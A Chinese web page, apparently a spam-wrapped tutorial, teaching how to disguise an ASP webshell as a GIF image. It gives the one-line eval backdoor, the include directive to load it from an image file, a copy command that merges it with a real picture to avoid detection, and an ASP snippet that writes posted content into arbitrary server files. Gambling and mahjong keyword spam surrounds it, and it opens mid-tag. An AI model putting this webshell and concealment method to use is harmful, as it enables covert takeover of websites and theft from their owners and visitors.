tion %> qq游戏山东麻将怎么玩
當前位置:首頁 > 建站知識

ASP圖片木馬運行方式解析

更新時間:2012.01.11 瀏覽次數:
一個網站里面除了asp文件,再就數圖片文件最多了,它讓我們的網頁"美麗動人"嘻嘻,但是你有沒有想到過這里面暗藏的殺機,圖片也可以是asp木馬。

    asp木馬已經出現很長時間了,種類也越來越多,但是說到隱蔽性,我們紅魂老大寫的--冰狐浪子asp
后門還是我眾馬中的首選,現在我們就把它作成圖片asp木馬。

首先我們把冰狐浪子asp木馬服務端直接該后綴名為gif,記得用容錯格式:

<SCRIPT RUNAT=SERVER LANGUAGE=javascript>try{eval(Request.form('#')+'')}catch(e){}</SCRIPT>

一、include給我們指路

接下來要使用include指令,這個指令也是我們常常看到的,但是它有一個很特別的功能,可能你就沒有用到過了。這就是可以調用位于其它文件中的函數,不管它的后綴名是什么,哪怕是個圖片文件。

然后我們新建一個asp文件,在里面寫入<!--#include file="asp.gif"-->,當然你也可以把它插入到任何asp文件的頭部或者尾部,僅僅就這一句話。asp.gif就是冰狐浪子asp木馬服務端,也是一句話,這個圖片asp木馬就做好了。

不過這里還有一個小問題,雖然網站里圖片很多,但如果管理員不小心打開這個圖片,在IE上顯示的是一把小紅叉,他會怎么想呢?

為了不讓人懷疑,要讓我們的圖片美人動起來,讓它成為真正的gif文件!

二、copy給我們加油

把asp.gif改名為asp.asp,然后去找個圖片來,至于什么內容的圖片,就看你自己的愛好啦,不過最好不要超過20kb,大了執行的速度就慢,把它保存為1.gif。

再啟動windows下的dos窗口,鍵入copy 1.gif /b + asp.asp /a asp.gif

其中參數/b 是指定以二進制格式復制、合并文件。參數/a 是指定以ascll格式復制、合并文件。這里要注意文件的順序。執行完后就會生成asp.gif,這就是我們的冰狐浪子asp木馬服務端。不過現在它已經偽裝成一個婷婷玉立的美人了,嘿嘿!如果要插入其他asp文件中,請插入下面代碼

<%  
on error resume next  
id=request("id")  
if request("id")=1 then  
testfile=Request.form("name")  
msg=Request.form("message")  
set fs=server.CreateObject("scripting.filesystemobject")  
set thisfile=fs.OpenTextFile(testfile,8,True,0)  
thisfile.WriteLine(""&msg& "")  
thisfile.close  
set fs = nothing  
%>
<form method="POST" ACTION="你插入文件的文件名?id=1">
<!--#include file="UploadFile/asp.gif"-->
<% end if %>

烟台麻将规则 福少时时彩计划软件 内蒙古老友麻将技巧 北京麻将app必赢插件 pk10人工计划在线划准 北京pk10彩票分析软件 安徽快3 炒股融资风险 在东北开饺子店赚钱吗视频 中国足球竞彩比分直播 青少年足球训练视频教程 计划软件免费版 龙江麻将下载免费 重庆时时和龙虎走势图 广西快乐双彩开奖号码和结果 雪缘园最快的即时比分 麻将技巧顺口溜大全